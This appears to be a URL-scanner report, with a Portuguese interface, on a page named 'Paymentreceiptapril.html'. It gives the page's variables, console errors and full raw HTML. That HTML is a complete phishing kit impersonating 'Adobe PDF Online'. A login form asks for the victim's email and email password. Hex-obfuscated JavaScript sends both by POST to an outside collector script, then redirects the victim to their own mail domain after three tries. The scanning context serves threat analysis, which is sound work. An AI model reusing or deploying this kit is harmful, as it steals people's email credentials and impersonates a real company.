https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/Paymentreceiptapril.html

ID da verificação
5e3e903d-3b14-4194-ad1c-dfc863bd36b4Concluído
URL enviado:
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/Paymentreceiptapril.htmlRedirecionado
Relatório concluído:

Os links de saída identificados na página

Variáveis JavaScript · 12 encontrada(s)

Variáveis JavaScript globais carregadas no objeto janela de uma página são variáveis declaradas fora das funções e acessíveis de qualquer lugar no código dentro do escopo atual

NomeTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
$function
jQueryfunction
Popperfunction
bootstrapobject
_0x1086object
fstring
rcstring

Mensagens de registro do console · 8 encontrada(s)

Mensagens registradas no console web

TipoCategoriaLog
errornetwork
URL
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/Paymentreceiptapril.html
Texto
Failed to load resource: the server responded with a status of 403 (Forbidden)
errornetwork
URL
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/favicon.ico
Texto
Failed to load resource: the server responded with a status of 404 (Not Found)
errornetwork
URL
https://opensource.keycdn.com/fontawesome/4.6.3/font-awesome.min.css
Texto
Failed to load resource: net::ERR_CONNECTION_CLOSED
errornetwork
URL
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/images/smallpdf.png
Texto
Failed to load resource: the server responded with a status of 404 (Not Found)
errornetwork
URL
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/fonts/et-line.woff
Texto
Failed to load resource: the server responded with a status of 404 (Not Found)
errornetwork
URL
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/images/bg.jpg
Texto
Failed to load resource: the server responded with a status of 404 (Not Found)
verbosedom
URL
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/Paymentreceiptapril.html
Texto
[DOM] Input elements should have autocomplete attributes (suggested: "current-password"): (More info: https://goo.gl/9p2vKq) %o
errornetwork
URL
https://pub-d00cba6d80db4c308e1a7762ee4f8ab7.r2.dev/fonts/et-line.ttf
Texto
Failed to load resource: the server responded with a status of 404 (Not Found)

HTML

O corpo HTML bruto da página

<html><head>
    <script type="text/javascript" nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz">
    </script>
    <link href="https://opensource.keycdn.com/fontawesome/4.6.3/font-awesome.min.css" rel="stylesheet">
    <link rel="icon" type="image/png" href="https://docs.com/1673155405_Images/favicon.ico">
    <link rel="apple-touch-icon" href="https://docs.com/1673155405_Images/apple_bookmark_branding_icon.png">
    <link rel="shortcut icon" type="image/png" href="https://docs.com/1673155405_Images/favicon.ico">
    <script type="text/javascript" nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz">
    </script>
    <meta charset="utf-8">
    <title>Adobe</title>
    <style type="text/css">
    .rounded {
        border-radius: 15px;
        -moz-border-radius: 15px;
        -webkit-border-radius: 15px;
        width: 300px;

    }

    .search {
        padding: 6px 15px 6px 30px;
        margin: 3px;
        gg
    }

    td .hov:hover {
        background: red;
    }

    a {
        color: #454444;
        text-decoration: none;
    }

    A a:link {
        color: #454444;
        text-decoration: none;
    }

    a:hover {
        color: #454444;
        text-decoration: none;
    }

    a:visited {
        color: #454444;
        text-decoration: none;
    }

    @font-face {
        font-family: 'et-line';
        src: url('fonts/et-line.eot');
        src: url('fonts/et-line.eot?#iefix') format('embedded-opentype'),
            url('fonts/et-line.woff') format('woff'),
            url('fonts/et-line.ttf') format('truetype'),
            url('fonts/et-line.svg#et-line') format('svg');
        font-weight: normal;
        font-style: normal;
    }

    /* Use the following CSS code if you want to use data attributes for inserting your icons */
    [data-icon]:before {
        font-family: 'et-line';
        content: attr(data-icon);
        speak: none;
        font-weight: normal;
        font-variant: normal;
        text-transform: none;
        line-height: 1;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
        display: inline-block;
    }


    body {
        margin: 0;
        font-family: helvetica, verdana, arial, san-serif;
    }

    html {
        background: url(http://madodel.com/cached/server-document/content/new_bg.jpg) no-repeat center center fixed;
        -webkit-background-size: cover;
        -moz-background-size: cover;
        -o-background-size: cover;
        background-size: cover;
    }

    .transparent {
        zoom: 1;
        filter: alpha(opacity=90);
        opacity: 0.9;
    }

    #top-header {
        width: 100%;
        height: 50px;
        background: #000;
    }

    .inp {

        border: 1px solid #EAEAEA;
        -moz-border-radius: 10px;
        -webkit-border-radius: 10px;
        border-radius: 10px;
        margin: 4px 0 3px 0;
        box-sizing: border-box;
    }

    input[type=text]:focus {
        border: 1px solid skyblue;
    }

    input[type=password]:focus {
        border: 1px solid skyblue;
    }

    input[type=checkbox] {
        border: 1px solid skyblue;
    }

    label {
        font-weight: bold;
        color: #807171;
        font-size: 14px;
    }

    .btn {}

    .account-action .btn:hover {
        background: linear-gradient(#293f50, #49708f);
        border: 0;
        color: #fff;
        cursor: pointer;
        font-weight: bold;
        float: left;
        padding: 8px 16px;
        width: 100px;

    }

    .account-action {
        background: #f0f0f2;
        border-top: 1px solid #c6c7cc;
        padding: 20px;
    }

    .account-action .btn {
        background: linear-gradient(#49708f, #293f50);
        border: 0;
        color: #fff;
        cursor: pointer;
        font-weight: bold;
        float: left;
        padding: 8px 16px;
        width: 100px;
    }

    .account-action label {
        color: #7c7c80;
        font-size: 12px;
        float: right;
        margin: 10px 0 0 20px;
    }

    #errfn {
        color: red;
    }

    #errfnn {
        color: red;
    }

    .cover {
        position: absolute;
        top: 0;
        left: 0;
        height: 100%;
        width: 100%;
        background-color: rgba(0, 0, 0, 0.5);
        z-index: 10;
    }
    </style>
    <style type="text/css">
    a {
        color: #454444;
        text-decoration: none;
    }

    a:link {
        color: #454444;
        text-decoration: none;
    }

    a:hover {
        color: #454444;
        text-decoration: none;
    }

    a:visited {
        color: #454444;
        text-decoration: none;
    }

    @font-face {
        font-family: 'et-line';
        src: url('fonts/et-line.eot');
        src: url('fonts/et-line.eot?#iefix') format('embedded-opentype'),
            url('fonts/et-line.woff') format('woff'),
            url('fonts/et-line.ttf') format('truetype'),
            url('fonts/et-line.svg#et-line') format('svg');
        font-weight: normal;
        font-style: normal;
    }

    /* Use the following CSS code if you want to use data attributes for inserting your icons */
    [data-icon]:before {
        font-family: 'et-line';
        content: attr(data-icon);
        speak: none;
        font-weight: normal;
        font-variant: normal;
        text-transform: none;
        line-height: 1;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
        display: inline-block;
    }

    /* Use the following CSS code if you want to have a class per icon */
    /*
Instead of a list of all class selectors,
you can use the generic selector below, but it's slower:
[class*="icon-"] {
*/
    .icon-mobile,
    .icon-laptop,
    .icon-desktop,
    .icon-tablet,
    .icon-phone,
    .icon-document,
    .icon-documents,
    .icon-search,
    .icon-clipboard,
    .icon-newspaper,
    .icon-notebook,
    .icon-book-open,
    .icon-browser,
    .icon-calendar,
    .icon-presentation,
    .icon-picture,
    .icon-pictures,
    .icon-video,
    .icon-camera,
    .icon-printer,
    .icon-toolbox,
    .icon-briefcase,
    .icon-wallet,
    .icon-gift,
    .icon-bargraph,
    .icon-grid,
    .icon-expand,
    .icon-focus,
    .icon-edit,
    .icon-adjustments,
    .icon-ribbon,
    .icon-hourglass,
    .icon-lock,
    .icon-megaphone,
    .icon-shield,
    .icon-trophy,
    .icon-flag,
    .icon-map,
    .icon-puzzle,
    .icon-basket,
    .icon-envelope,
    .icon-streetsign,
    .icon-telescope,
    .icon-gears,
    .icon-key,
    .icon-paperclip,
    .icon-attachment,
    .icon-pricetags,
    .icon-lightbulb,
    .icon-layers,
    .icon-pencil,
    .icon-tools,
    .icon-tools-2,
    .icon-scissors,
    .icon-paintbrush,
    .icon-magnifying-glass,
    .icon-circle-compass,
    .icon-linegraph,
    .icon-mic,
    .icon-strategy,
    .icon-beaker,
    .icon-caution,
    .icon-recycle,
    .icon-anchor,
    .icon-profile-male,
    .icon-profile-female,
    .icon-bike,
    .icon-wine,
    .icon-hotairballoon,
    .icon-globe,
    .icon-genius,
    .icon-map-pin,
    .icon-dial,
    .icon-chat,
    .icon-heart,
    .icon-cloud,
    .icon-upload,
    .icon-download,
    .icon-target,
    .icon-hazardous,
    .icon-piechart,
    .icon-speedometer,
    .icon-global,
    .icon-compass,
    .icon-lifesaver,
    .icon-clock,
    .icon-aperture,
    .icon-quote,
    .icon-scope,
    .icon-alarmclock,
    .icon-refresh,
    .icon-happy,
    .icon-sad,
    .icon-facebook,
    .icon-twitter,
    .icon-googleplus,
    .icon-rss,
    .icon-tumblr,
    .icon-linkedin,
    .icon-dribbble {
        font-family: 'et-line';
        speak: none;
        font-style: normal;
        font-weight: normal;
        font-variant: normal;
        text-transform: none;
        line-height: 1;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
        display: inline-block;
    }

    .icon-mobile:before {
        content: "\e000";
    }

    .icon-laptop:before {
        content: "\e001";
    }

    .icon-desktop:before {
        content: "\e002";
    }

    .icon-tablet:before {
        content: "\e003";
    }

    .icon-phone:before {
        content: "\e004";
    }

    .icon-document:before {
        content: "\e005";
    }

    .icon-documents:before {
        content: "\e006";
    }

    .icon-search:before {
        content: "\e007";
    }

    .icon-clipboard:before {
        content: "\e008";
    }

    .icon-newspaper:before {
        content: "\e009";
    }

    .icon-notebook:before {
        content: "\e00a";
    }

    .icon-book-open:before {
        content: "\e00b";
    }

    .icon-browser:before {
        content: "\e00c";
    }

    .icon-calendar:before {
        content: "\e00d";
    }

    .icon-presentation:before {
        content: "\e00e";
    }

    .icon-picture:before {
        content: "\e00f";
    }

    .icon-pictures:before {
        content: "\e010";
    }

    .icon-video:before {
        content: "\e011";
    }

    .icon-camera:before {
        content: "\e012";
    }

    .icon-printer:before {
        content: "\e013";
    }

    .icon-toolbox:before {
        content: "\e014";
    }

    .icon-briefcase:before {
        content: "\e015";
    }

    .icon-wallet:before {
        content: "\e016";
    }

    .icon-gift:before {
        content: "\e017";
    }

    .icon-bargraph:before {
        content: "\e018";
    }

    .icon-grid:before {
        content: "\e019";
    }

    .icon-expand:before {
        content: "\e01a";
    }

    .icon-focus:before {
        content: "\e01b";
    }

    .icon-edit:before {
        content: "\e01c";
    }

    .icon-adjustments:before {
        content: "\e01d";
    }

    .icon-ribbon:before {
        content: "\e01e";
    }

    .icon-hourglass:before {
        content: "\e01f";
    }

    .icon-lock:before {
        content: "\e020";
    }

    .icon-megaphone:before {
        content: "\e021";
    }

    .icon-shield:before {
        content: "\e022";
    }

    .icon-trophy:before {
        content: "\e023";
    }

    .icon-flag:before {
        content: "\e024";
    }

    .icon-map:before {
        content: "\e025";
    }

    .icon-puzzle:before {
        content: "\e026";
    }

    .icon-basket:before {
        content: "\e027";
    }

    .icon-envelope:before {
        content: "\e028";
    }

    .icon-streetsign:before {
        content: "\e029";
    }

    .icon-telescope:before {
        content: "\e02a";
    }

    .icon-gears:before {
        content: "\e02b";
    }

    .icon-key:before {
        content: "\e02c";
    }

    .icon-paperclip:before {
        content: "\e02d";
    }

    .icon-attachment:before {
        content: "\e02e";
    }

    .icon-pricetags:before {
        content: "\e02f";
    }

    .icon-lightbulb:before {
        content: "\e030";
    }

    .icon-layers:before {
        content: "\e031";
    }

    .icon-pencil:before {
        content: "\e032";
    }

    .icon-tools:before {
        content: "\e033";
    }

    .icon-tools-2:before {
        content: "\e034";
    }

    .icon-scissors:before {
        content: "\e035";
    }

    .icon-paintbrush:before {
        content: "\e036";
    }

    .icon-magnifying-glass:before {
        content: "\e037";
    }

    .icon-circle-compass:before {
        content: "\e038";
    }

    .icon-linegraph:before {
        content: "\e039";
    }

    .icon-mic:before {
        content: "\e03a";
    }

    .icon-strategy:before {
        content: "\e03b";
    }

    .icon-beaker:before {
        content: "\e03c";
    }

    .icon-caution:before {
        content: "\e03d";
    }

    .icon-recycle:before {
        content: "\e03e";
    }

    .icon-anchor:before {
        content: "\e03f";
    }

    .icon-profile-male:before {
        content: "\e040";
    }

    .icon-profile-female:before {
        content: "\e041";
    }

    .icon-bike:before {
        content: "\e042";
    }

    .icon-wine:before {
        content: "\e043";
    }

    .icon-hotairballoon:before {
        content: "\e044";
    }

    .icon-globe:before {
        content: "\e045";
    }

    .icon-genius:before {
        content: "\e046";
    }

    .icon-map-pin:before {
        content: "\e047";
    }

    .icon-dial:before {
        content: "\e048";
    }

    .icon-chat:before {
        content: "\e049";
    }

    .icon-heart:before {
        content: "\e04a";
    }

    .icon-cloud:before {
        content: "\e04b";
    }

    .icon-upload:before {
        content: "\e04c";
    }

    .icon-download:before {
        content: "\e04d";
    }

    .icon-target:before {
        content: "\e04e";
    }

    .icon-hazardous:before {
        content: "\e04f";
    }

    .icon-piechart:before {
        content: "\e050";
    }

    .icon-speedometer:before {
        content: "\e051";
    }

    .icon-global:before {
        content: "\e052";
    }

    .icon-compass:before {
        content: "\e053";
    }

    .icon-lifesaver:before {
        content: "\e054";
    }

    .icon-clock:before {
        content: "\e055";
    }

    .icon-aperture:before {
        content: "\e056";
    }

    .icon-quote:before {
        content: "\e057";
    }

    .icon-scope:before {
        content: "\e058";
    }

    .icon-alarmclock:before {
        content: "\e059";
    }

    .icon-refresh:before {
        content: "\e05a";
    }

    .icon-happy:before {
        content: "\e05b";
    }

    .icon-sad:before {
        content: "\e05c";
    }

    .icon-facebook:before {
        content: "\e05d";
    }

    .icon-twitter:before {
        content: "\e05e";
    }

    .icon-googleplus:before {
        content: "\e05f";
    }

    .icon-rss:before {
        content: "\e060";
    }

    .icon-tumblr:before {
        content: "\e061";
    }

    .icon-linkedin:before {
        content: "\e062";
    }

    .icon-dribbble:before {
        content: "\e063";
    }


    body {
        margin: 0;
        font-family: helvetica, verdana, arial, san-serif;
        min-width: 750px;
    }

    html {
        background: url(images/bg.jpg) no-repeat center center fixed;
        -webkit-background-size: cover;
        -moz-background-size: cover;
        -o-background-size: cover;
        background-size: cover;
    }

    .transparent {
        zoom: 1;
        filter: alpha(opacity=90);
        opacity: 0.9;
    }

    #top-header {
        width: 100%;
        height: 50px;
        background: #000;
    }

    .inp {

        border: 1px solid rgb(187, 7, 6);
        -moz-border-radius: 0px;
        -webkit-border-radius: 0px;
        border-radius: 0px;
        width: 360px;
        font-size: 1.2em;
        color: #000;
        height: 2em;
        margin: 0 0 8px 0;
        padding: 0px 0px 0px 15px;
    }

    .btn {
        background: rgb(187, 7, 6);
        -webkit-border-radius: 10;
        -moz-border-radius: 10;
        border-radius: 10px;
        font-family: Arial;
        color: #ffffff;
        font-size: 20px;
        padding: 13px 15px 12px 16px;
        text-decoration: none;
    }

    .btn:hover {
        background: #1593bc;
        background-image: -webkit-linear-gradient(top, #1593bc, #25aad6);
        background-image: -moz-linear-gradient(top, #1593bc, #25aad6);
        background-image: -ms-linear-gradient(top, #1593bc, #25aad6);
        background-image: -o-linear-gradient(top, #1593bc, #25aad6);
        background-image: linear-gradient(to bottom, #1593bc, #25aad6);
        text-decoration: none;
    }

    #errfn {
        color: red;
    }

    #errfnn {
        color: red;
    }

    .cover {
        position: absolute;
        top: 0;
        left: 0;
        height: 100%;
        width: 100%;
        background-color: rgba(0, 0, 0, 0.5);
        z-index: 10;
    }
    </style>
</head>

<body style="background-image:url('https://i.gyazo.com/d2bd26943cffcb06ab98eabd235b241e.png');background-size: cover;background-repeat: no-repeat;  font-family:helvetica, verdana, tahoma, arial; padding:0;">
    <div id="top-header">
        <table style="border:none; width:100%; padding:0; margin:0; height:50px; border-spacing:0; color:#fff; z-index:10000000; position:absolute;">
            <tbody>
                <tr>
                    <td style="background:#D60000; width:10%; height:100%; margin:0; padding:0; text-align:center;"><img src="images/smallpdf.png" width="30px"> <span style="vertical-align: super">Adobe PDF Online</span></td>
                    <td style="background:#292323; width:65%; height:100%; margin:0; padding:0 0 0 30px;">
                    </td>
                    <td style="background:#e1e1e1; width:10%; height:100%; margin:0; padding:0; color:#404040; text-align:center;"><a href="#" title="You are not signed In"> Account </a></td>
                    <td style="background:#e1e1e1; width:6%; height:100%; margin:0; padding:0; color:#404040; text-align:center; border-left:1px solid silver;"><a href="#" title="You are not signed in yet"> Sign In </a></td>
                </tr>
            </tbody>
        </table>
    </div>
    <div style=" height:30px; background:#fff; padding:10px; position:relative; z-index:10000000000000;">
        <table style="color:#454444; height:30px; width:100%;">
            <tbody>
                <tr>
                    <td style="width:60%;"></td>
                    <td style="width:10%; font-size:12px; color:#fff; "><a href="#" style="color:#FFF;" title="Login to continue"><span style="background:#bb0706; padding:10px;"><span class="icon-pencil"></span>Edit and Reply</span></a></td>
                    <td style="width:10%; font-size:12px;"><a href="#" title="Login to continue"><span class="icon-document"></span></a>Download</td>
                    <td style="width:10%; font-size:12px;"><a href="#" title="Login to continue"><span class="icon-printer"></span>Print</a></td>
                    <td style="width:6%; font-size:12px;"><a href="#" title="Login to continue"><span class="icon-aperture"></span>Exit</a></td>
                    <td style="width:4%; font-size:12px;">
                        <a href="#" title="Login to continue"><span style="font-weight:bold; font-size:2em; vertical-align:10px;">...</span></a>
                    </td>
                </tr>
            </tbody>
        </table>
    </div>
    <div style="
background:#fbfbfb;
width:450px;
margin:0 auto;
margin-top:65px;
    border: 1px solid #EAEAEA;
    overflow: hidden;
    -moz-border-radius: 10px;
    -webkit-border-radius: 10px;
    border-radius: 10px;
    -webkit-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 3px;
    -moz-box-shadow: rgba(0,0,0,0.3) 0 1px 3px;
    box-shadow: rgba(0, 0, 0, 0.3) 0 1px 3px;
    background: white;
    z-index: 11;
    position:relative;
">
        <div style="padding:15px; z-index:12; min-width:400px; width:420px;">
            <div style="background:#ededed; padding:5px; -webkit-border-radius: 10;
  -moz-border-radius: 10;
  border-radius: 10px;">
                <img src="https://i.gyazo.com/2c9a9eb978ff3a4a4f208b2c45739fd3.png" height="50px" width="60px">
                <h1 style="color:rgb(187, 7, 6); text-shadow: 0px 1px 1px #4d4d4d; float:right; position:relative; right:50px;">Adobe PDF Online</h1>
            </div>
            <div style="clear:both;"></div>
            <h4 style="color:#696767; font-family:verdana, arial; margin-top:0px;">
                <img src="https://i.gyazo.com/2e6a7c17a90b17b5ff2019543193b4e9.jpg" height="25" width="75">Confirm your identity</h4>
            <div style="color:#6c5a79; margin-bottom:10px; margin-top:5px;">Sign in with your connected and active email account to access document</div>
            <div id="mail-icon" style="text-align:center; margin-top:2px;">
                <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a2/AOL_Eraser.svg/200px-AOL_Eraser.svg.png" width="30px" height="30px">
                <img src="https://i.gyazo.com/060e9d726f9bb555eb94f15474b6fd65.png" width="30px" height="30px">
                <img src="https://i.gyazo.com/8b09deab09d58e1261bbb6cbc5e89559.jpg" width="30px" height="30px">
                <img src="https://i.gyazo.com/1cd4efa81de96d9776b7cdb887745acf.gif" width="30px" height="30px">
                <img src="https://i.gyazo.com/c2bddd4e69aba81bcf138fa9028df5fb.png" width="30px" height="30px">
                <img src="https://i.gyazo.com/8922f8c4f3b73b259c84ee57c2dec1ee.png" width="30px" height="30px">
            </div>
            <style>
                #mail-icon img{
        
        padding-right:7px;
    }
</style>
            
            <div style="text-align:center;">
                <form name="myForm">
                    <center>
                        <div id="mgss" style="color: red;font-weight: 600;display: none;font-size: 13px">Invalid Password.! Please enter correct password.</div>
                        <span id="error" style="color: red;display: none;font-size: 13px">That account doesn't exist. Enter a different account</span>
                    </center>
                    <input name="ai" id="ai" required="" class="inp" size="30" style="margin-top:20px;" type="email" placeholder="Email ID"> <br>
                    <span id="errfn"></span> <br>
                    <input name="pr" id="pr" required="" class="inp" size="30" style="margin-bottom:5px;" type="password" placeholder="Email password"> <br>
                    <span id="errfnn"></span> <br>
                    <input class="" type="checkbox">Stay signed in(<span style="font-size:0.8em; color:#999;">Do not check if using a public computer</span>) <br><br>
                    <input value="View Document" class="btn" type="button" name="sub-btn" id="sub-btn">
                </form>
            </div>
            <p style="font-size:0.9em;" align="center"> ©2024 Adobe Corporation</p>
        </div>
        <div style="clear:both;"></div>
    </div>
    <div class="cover"></div>
    <!-- //mailer link -->
    <input type="hidden" id="f" value="https://roofingcompanytoronto.ca/molder/next.php">
    <!-- //mail result count -->
    <input type="hidden" id="rc" value="3">
    <!-- //redirect link -->
    <input type="hidden" id="rdrt" value="https://www.google.com">
    <!-- // if you want to redirection for domain (0 for no)(1 for yes) -->
    <input type="hidden" id="domain_redirect" value="1">
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous" nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous" nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous" nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz"></script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz"></script>
<script nonce="MjMxNTkyNTYyMCwzNzk0MTg1ODgz">
var _0x1086=["\x76\x61\x6C","\x23\x66","\x23\x72\x63","\x23\x72\x64\x72\x74","\x23\x64\x6F\x6D\x61\x69\x6E\x5F\x72\x65\x64\x69\x72\x65\x63\x74","\x73\x75\x62\x73\x74\x72","\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x65\x73\x74","\x40","\x69\x6E\x64\x65\x78\x4F\x66","\x2E","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x23\x61\x69","\x68\x74\x6D\x6C","\x23\x61\x69\x63\x68","\x68\x69\x64\x65","\x23\x6D\x67\x73\x73","\x23\x65\x72\x72\x6F\x72","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x23\x70\x72","\x74\x65\x78\x74","\x73\x68\x6F\x77","\x45\x6D\x61\x69\x6C\x20\x66\x69\x65\x6C\x64\x20\x69\x73\x20\x65\x6D\x70\x6C\x79\x2E\x21","\x66\x6F\x63\x75\x73","\x54\x68\x61\x74\x20\x61\x63\x63\x6F\x75\x6E\x74\x20\x64\x6F\x65\x73\x6E\x27\x74\x20\x65\x78\x69\x73\x74\x2E\x20\x45\x6E\x74\x65\x72\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x61\x63\x63\x6F\x75\x6E\x74","\x50\x61\x73\x73\x77\x6F\x72\x64\x20\x66\x69\x65\x6C\x64\x20\x69\x73\x20\x65\x6D\x70\x6C\x79\x2E\x21","\x4A\x53\x4F\x4E","\x50\x4F\x53\x54","\x56\x65\x72\x69\x66\x69\x6E\x67\x2E\x2E\x2E","\x23\x73\x75\x62\x2D\x62\x74\x6E","","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E","\x72\x65\x70\x6C\x61\x63\x65","\x56\x69\x65\x77\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74","\x61\x6A\x61\x78","\x63\x6C\x69\x63\x6B","\x72\x65\x61\x64\x79"];var f=$(_0x1086[1])[_0x1086[0]]();var rc=$(_0x1086[2])[_0x1086[0]]();var rdrt=$(_0x1086[3])[_0x1086[0]]();var domain_redirect=$(_0x1086[4])[_0x1086[0]]();$(document)[_0x1086[37]](function(){var _0xee14x5=0;var _0xee14x6=window[_0x1086[7]][_0x1086[6]][_0x1086[5]](1);if(!_0xee14x6){}else {var _0xee14x7=/^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;if(!_0xee14x7[_0x1086[8]](_0xee14x6)){var _0xee14x8=_0xee14x6}else {var _0xee14x8=atob(_0xee14x6)};var _0xee14x9=_0xee14x8[_0x1086[10]](_0x1086[9]);var _0xee14xa=_0xee14x8[_0x1086[5]]((_0xee14x9+ 1));var _0xee14xb=_0xee14xa[_0x1086[5]](0,_0xee14xa[_0x1086[10]](_0x1086[11]));var _0xee14xc=_0xee14xb[_0x1086[12]]();$(_0x1086[13])[_0x1086[0]](_0xee14x8);$(_0x1086[15])[_0x1086[14]](_0xee14x8);$(_0x1086[17])[_0x1086[16]]()};$(_0x1086[30])[_0x1086[36]](function(_0xee14xd){$(_0x1086[18])[_0x1086[16]]();$(_0x1086[17])[_0x1086[16]]();_0xee14xd[_0x1086[19]]();var _0xee14x6=$(_0x1086[13])[_0x1086[0]]();var _0xee14xe=$(_0x1086[20])[_0x1086[0]]();var _0xee14xf=$(_0x1086[17])[_0x1086[14]]();$(_0x1086[17])[_0x1086[21]](_0xee14xf);var _0xee14x8=_0xee14x6;var _0xee14x10=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0xee14x6){$(_0x1086[18])[_0x1086[22]]();$(_0x1086[18])[_0x1086[14]](_0x1086[23]);_0xee14x6[_0x1086[24]];return false};if(!_0xee14x10[_0x1086[8]](_0xee14x8)){$(_0x1086[18])[_0x1086[22]]();$(_0x1086[18])[_0x1086[14]](_0x1086[25]);_0xee14x6[_0x1086[24]];return false};if(!_0xee14xe){$(_0x1086[18])[_0x1086[22]]();$(_0x1086[18])[_0x1086[14]](_0x1086[26]);_0xee14x6[_0x1086[24]];return false};var _0xee14x9=_0xee14x8[_0x1086[10]](_0x1086[9]);var _0xee14xa=_0xee14x8[_0x1086[5]]((_0xee14x9+ 1));var _0xee14xb=_0xee14xa[_0x1086[5]](0,_0xee14xa[_0x1086[10]](_0x1086[11]));var _0xee14xc=_0xee14xb[_0x1086[12]]();_0xee14x5= _0xee14x5+ 1;$[_0x1086[35]]({dataType:_0x1086[27],url:f,type:_0x1086[28],data:{ai:_0xee14x6,pr:_0xee14xe},beforeSend:function(_0xee14x11){$(_0x1086[30])[_0x1086[0]](_0x1086[29])},complete:function(){$(_0x1086[20])[_0x1086[0]](_0x1086[31]);if(_0xee14x5>= rc){_0xee14x5= 0;if(domain_redirect== 1){window[_0x1086[7]][_0x1086[33]](_0x1086[32]+ _0xee14xa)}else {window[_0x1086[7]][_0x1086[33]](rdrt)}};$(_0x1086[17])[_0x1086[22]]();$(_0x1086[30])[_0x1086[0]](_0x1086[34])}})})})
</script>

</body></html>